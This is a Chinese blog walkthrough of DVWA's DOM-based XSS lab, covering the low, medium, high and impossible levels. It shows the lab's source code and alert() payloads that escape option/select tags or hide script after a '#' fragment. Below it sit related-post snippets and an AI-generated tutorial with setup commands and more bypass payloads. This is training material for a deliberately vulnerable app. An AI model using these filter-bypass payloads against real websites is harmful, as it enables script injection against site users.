【网络安全】DVWA之XSS(DOM)攻击姿势及解题详析合集

原创 已于 2025-01-05 16:29:00 修改 · 1.3w 阅读 · 13 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #xss #javascript

于 2023-05-16 17:04:31 首次发布
文章详细分析了DOM型XSS攻击的不同级别,从低级到高级,包括如何绕过源代码过滤,利用<script>和<option>标签进行payload构造,以及在高难度级别中使用白名单机制防止攻击。同时,讨论了Impossiblelevel的情况,展示了即使在严格条件下,攻击者可能如何尝试注入恶意脚本。
部署运行你感兴趣的模型镜像

文章目录

XSS(DOM)-low level

源代码未进行任何过滤
复选框中的内容为可变参数

在这里插入图片描述
Payload:<script>alert("qiu")</script>

在这里插入图片描述

XSS(DOM)-medium level

源代码

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}
?>

功能如下:

1.通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。

2.使用 stripos() 函数查找 $default 中是否包含 <script 字符串,如果包含,则通过 header() 函数将页面重定向到 ?default=English

姿势

正常Select时,页面如下:

在这里插入图片描述
采用其它XSS标签

Payload:<img src=1 onerror=alert("qiu")>
页面如下:

在这里插入图片描述
上图说明XSS语句被包含在option标签里
此时客户端为:

<select><option <img xss语句>> </option>

因此要想办法使XSS语句逃逸
Payload:></option><img src=1 onerror=alert("qiu")>

在这里插入图片描述此时客户端为:

<select><option></option><img xss语句>> </option>

化简后即为

<select><img xss语句>></option>

由于select标签的存在,XSS语句仍然不可逃逸,加入</select>标签
Payload:></option></select><img src = 1 onerror = alert("qiu")>
此时客户端为:

<select><option></option></select><img xss语句>> </option>

化简后即为

<img xss语句>></option>

由于后面的</option>没有<option>与之匹配,变为

<img xss语句>

在这里插入图片描述
攻击成功:

在这里插入图片描述

script与option标签

<script> 标签用于在 HTML 页面中嵌入 JavaScript 脚本代码,通过在浏览器中执行这些脚本来实现一些与用户交互、数据处理、动态效果等相关的功能。常见的应用包括表单验证、事件处理、页面跳转等。

<option> 标签用于制作下拉框(<select>)中选项的列表。每个<option>元素定义了一个可选项目的值和显示文本,通过设置其 value 属性和 innerHTML 属性来定义项目的值和文本。

XSS(DOM)-high level

源代码

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?>

1、使用 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则继续进行后续校验;否则直接跳过。

2、在 switch 语句中实现一个白名单机制,将可接受的语言作为取值,所有其他语言都会默认被转换为英语。这里的语言包括:英语、法语、德语和西班牙语。

3、如果用户输入的语言不在白名单列表中,则会通过 header() 函数将页面重定向到 ?default=English,这样就避免了潜在的安全漏洞。

姿势

原理: 该JavaScript 函数为客户端HTML页面中对表单元素进行限制和过滤,不涉及与服务端的通信和交互。因此,即使该 JavaScript 代码被恶意用户修改,也不会影响到服务器端对表单参数的处理结果。
由于#后的代码在客户端被注释,因此注入语句不会被传入服务器端,从而达到注入效果。

Payload:#<script>alert("qiu")</script>

在这里插入图片描述

XSS(DOM)-Impossible level

源代码

if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=") + 8);
    document.write("<option value='" + lang + "'>" + (lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
}

document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");

代码审计

1、使用 indexOf() 函数来判断当前页面的 URL 是否包含字符串 "default=",如果包含则返回相应的位置,否则返回 -1

2、如果 URL 中包含 default 参数,则使用 substring() 函数来获取该参数的值,具体方式是从 URL 中 "default=" 字符串后面开始截取,长度为 8(即 "default=" 的长度),得到 lang 变量。

3、使用 document.write() 函数来输出 HTML 代码,首先输出 lang 变量对应的选项(如果存在),然后输出 ---- 分隔符选项,最后分别输出英语、法语、西班牙语和德语等可选项。其中,每个选项都被定义为一个 option 标签,并且包括一个 value 属性和显示文本。如果 lang 变量为空,则表示没有 default 参数,此时不需要输出任何额外的选项。

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

网络安全XSS之Cookie外带攻击姿势及例题
等风来
05-19 9356
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
玩转DVWAXSS DOM
key01362000的博客
09-29 1262
DVWAXSS DOM攻击
DVWADOMXSS
qq_39682037的博客
03-19 2507
DOMXSS 是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触发不需要经过服务器端,也就是说,服务端的防御并不起作用。 Security Level: low 源码 <?php # No protections, anything goes ?> 分 什么限制都没有,大胆尝试 进行下方的实验 发现在url的default写什么页面便生成什...
dvwa中的XSS攻击(反射)
qq_45653152的博客
06-13 2000
三种xss: 反射:需攻击者提前构造一个恶意链接,诱使用户点击(经后端,不经数据库) 存储:攻击者在论坛的楼层包含一段恶意代码,并且服务器未进行正确的过滤输出,造成浏览该页面的用户执行这段代码(经过后端与数据库) DOM:利用非法输入来闭合对应的HTML标签(不经过后端,是基于文档对象模型的一种漏洞,是通过url传入参数去控制触发的) Xss(refiected反射型) Low等级: 代码显示X-XSS-Protection:0(0: 表示关闭浏览器的XSS防护机制)即未实施任何防御措施,且对name没有任
什么是 XSS - 跨站脚本攻击?区分存储型 / 反射型 / DOM 型,附针对性防范策略!
shandongjiushen的博客
10-23 900
跨站脚本攻击(xss),指攻击者通过篡改网页,嵌入恶意脚本程序,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
DVWAXSSDOM
RexHa的博客
10-06 2508
dvwa XSSDOM
DVWA XSS DOM
m0_56107268的博客
04-30 1258
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
[网络安全] DVWA之CSRF攻击姿势解题合集
2401_88326437的博客
01-02 1110
以上为 [网络安全] DVWA之CSRF攻击姿势解题合集,考察CSRFBurp使用及PHP代码审计等相关知识。
网络安全-靶机dvwaXSS注入Low到High解(含代码分)_dvwa xss注入
2401_84300255的博客
04-27 1081
正常可以看到是Get型。
DVWA靶场XSS DOM型LOW级别演示举例
2301_77185537的博客
12-24 571
因此尝试修改URL中的default值,使它等于经典的XSS脚本payload网页弹窗。:因此我们查看网页前端的源代码,因为处理用户输入的只有前端的JavaScript代码。能够调出网页弹窗,也就能说明我们注入其他恶意的JavaScript代码也是没有问题的。:查看网站后台的PHP源代码,发现服务器端没有任何的PHP限制。:首先打开DVWA靶场XSS DOM 模块。靶场XSS DOM型模块举例。
DVWA-XSS(DOM)
weixin_44866139的博客
01-29 2940
XSS 简介 参考链接 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模型...
DVWA靶场通关——DOMXSS漏洞
sucker的博客
11-29 3602
DOMXSSDOM-based Cross-Site Scripting,DOM XSS)是一种跨站脚本攻击XSS)的变种,它与传统的反射型XSS(Reflected XSS)或存储型XSS(Stored XSS)有所不同,主要是发生在客户端(浏览器端),并且依赖于网页中动态的文档对象模型(DOM)结构。:如果页面存在涉及状态更改的操作(如修改密码、删除内容等),而没有对请求进行适当的防护(例如 CSRF token),攻击者可以利用该漏洞执行伪造的操作,导致用户的会话受到攻击
DVWAXSS
谢公子的博客
08-05 2140
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSSDOM型的XSS由于其特殊性,常...
DVWA DOMXSS
scrawman的博客
02-27 481
前言 DVWA上的DOMXSS与反射型和存储型XSS不同,页面上是没有输入的,所以要直接在URL上实施攻击 一、Low low级别的代码什么防护都没有,因此直接输入URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=<script>alert('xss')</script> 二、Medium Medium级别的代码增加了检查机制,如果输入当中有“<script”就把default设为English阻止XS
一、DVWA_DOMXSS
在下小黄的博客
05-22 1978
第一篇,DVWA_DOMXSS
DVWA靶场通关----(10) XSS(DOM)教程
叶澜╭的博客
04-02 1139
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。document.referer属性。
DVWA系列】——Brute Force(暴力破解)——low
2402_84408069的博客
06-04 882
本文介绍了在DVWA安全级别环境下使用Burp Suite工具进行暴力破解测试的技术方法。实验步骤包括:1)准备DVWA测试环境;2)配置Burp Suite拦截登录请求;3)标记密码参数并使用Sniper攻击模式;4)加载密码字典实施爆破;5)通过分响应状态码和长度识别有效密码。文章包含完整的操作截图和细说明,最终成功通过爆破获取登录凭证。文末特别强调该技术仅限合法授权测试,并附有尽的法律免责声明,要求读者严格遵守网络安全法律法规和道德规范,仅将技术用于授权环境的安全研究。
DVWA--XSS(DOM)
weixin_45038413的博客
05-09 716
Javascript弹窗函数 Low 等级 Medium 等级 过滤了<script stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写) 使用img标签发现没有弹窗 查看网页源码,发现语句被插入到了value值中,并没有插入到option标签的值中,所以img标签并没有发起任何作用。 构造语句闭合option标签: default=></o...
DVWA--XSS (DOM)
When you collect everything, you understand nothing.
09-09 487
0x00简介 DOM XSS漏洞是基于文档对象模型(Document Object Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。 DOM中有很多对象,其中一些是用户可以操纵的,如url、location、refere等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不...
dvwa靶场xssdom,用kali和win10
最新发布
11-05
<think>嗯,用户需要了解在Kali和Win10系统下使用DVWA靶场进行XSS DOM攻击的方法和教程。用户已经提供了三个相关引用,说明用户对DVWA靶场、XSS DOM攻击的基本概念有一定了解,现在需要具体的操作指导。 用户可能正在学习Web安全渗透测试,可能是安全初学者或CTF选手。ta明确要求跨平台操作指导(Kali和Win10),说明实际环境中可能同时使用这两类系统。深层需求应该是想掌握不同环境下的标准化攻击流程,而不仅仅是理论。 从引用来看,关键信息点包括:DVWA靶场部署方法(引用2)、DOMXSS攻击特征(引用1和3),特别是引用3提到用#号绕过服务器直接操作DOM的技巧很有实操价值。 需要重点解决三个层面: 1. 环境搭建:区分Kali(Linux)和Win10的部署差异,尤其是Win10可能遇到的权限问题 2. 攻击原理:解释为什么DOMXSS可以不经过服务器,这与反射型/存储型的本质区别 3. 实操演示:必须包含输入示例和预期结果,像引用3的payload需要优化(原示例有HTML实体编码问题) 特别注意要强调法律边界,引用1已声明"严禁非法攻击",在教程中需强化警告。技术细节上,DOMXSS的#号技巧在DVWA的low级别有效,但medium/high级别需要其他绕过方法,用户没提难度级别,所以从基础开始。 最后考虑加入攻击日志分,因为用户引用中没提如何验证成功,实际需要查看浏览器开发者工具。 </think>以下是在Kali和Windows 10系统下使用DVWA靶场进行DOMXSS攻击的完整操作指南,包含环境搭建和攻击实战步骤: --- ### 一、环境搭建 #### ▶ Kali系统部署 ```bash # 1. 下载DVWA git clone https://github.com/digininja/DVWA.git cd DVWA # 2. 配置数据库 sudo mysql -u root > create database dvwa; > grant all on dvwa.* to 'dvwa'@'localhost' identified by 'p@ssw0rd'; > flush privileges; # 3. 修改配置文件 cp config/config.inc.php.dist config/config.inc.php nano config/config.inc.php # 修改数据库密码为 p@ssw0rd # 4. 启动服务 sudo systemctl start apache2 mysql ``` 访问 `http://localhost/DVWA/setup.php` 点击"Create/Reset Database" [^2] #### ▶ Windows 10系统部署 1. 安装XAMPP(含Apache+MySQL) 2. 下载DVWA压缩包解压到 `htdocs` 目录 3. 修改 `config/config.inc.php` 中的数据库密码: ```php $_DVWA[ 'db_password' ] = 'p@ssw0rd'; ``` 4. 访问 `http://localhost/DVWA/setup.php` 初始化数据库[^1] --- ### 二、DOMXSS攻击实战 #### ▶ 攻击路径 访问:`DVWAXSS (DOM) → Low Security Level` #### ▶ 攻击步骤 1. **观察URL参数** URL格式:`http://靶场地址/vulnerabilities/xss_d/?default=English` ```mermaid graph LR URL参数 --> default=值 --> 页面DOM直接输出 ``` 2. **构造恶意Payload** 在URL末尾追加(注意空格): ``` #<script>alert('XSS_by_zky50')</script> ``` 完整URL示例: ``` http://localhost/DVWA/vulnerabilities/xss_d/?default=English#<script>alert('XSS_by_zky50')</script> ``` 3. **攻击原理分** - `#` 后的内容不会发送到服务器(DOM型特征)[^3] - 页面JavaScript直接读取 `location.hash` 并输出 - 前端源码漏洞点: ```javascript document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>"); ``` - 若输入为 `#<script>...</script>` 会被解为HTML标签 4. **中/高安全等级绕过技巧** ```python # Medium级别绕过示例 #<img src=x onerror=alert(1)> # High级别绕过(需闭合标签) #</option></select><svg onload=alert(document.domain)> ``` --- ### 三、防御建议 1. 前端过滤:对 `location.hash` 使用 `encodeURIComponent()` 2. 服务端校验:即使DOMXSS不依赖服务端,也应验证参数格式 3. 内容安全策略:设置CSP头 ```http Content-Security-Policy: script-src 'self' ``` > **法律声明**:本文仅供学习防御技术使用,未经授权对他人的系统实施攻击属于违法行为,使用者需自行承担法律责任[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值